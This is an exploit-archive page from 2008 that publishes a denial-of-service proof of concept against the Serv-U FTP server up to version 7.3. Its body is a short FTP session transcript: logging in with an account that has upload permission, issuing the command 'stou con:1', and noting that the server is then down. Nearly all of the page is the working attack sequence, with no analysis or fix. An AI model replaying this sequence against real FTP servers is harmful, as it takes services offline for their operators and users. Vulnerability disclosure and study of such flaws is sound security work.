[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Serv-U <= 7.3 (stou con:1) Denial of Service Vulnerability (auth)
# Published : 2008-10-03
# Author : dmnt
# Previous Title : VBA32 Personal Antivirus 3.12.8.x (malformed archive) DoS Exploit
# Next Title : vxFtpSrv 2.0.3 CWD command Remote Buffer Overflow PoC
#Serv-U <= 7.2.0.1 / 7.3 ftp server DoS
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.3 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
stou con:1
quit
221 Goodbye, closing session.
# now server DoS'ed
# www.Syue.com [2008-10-03]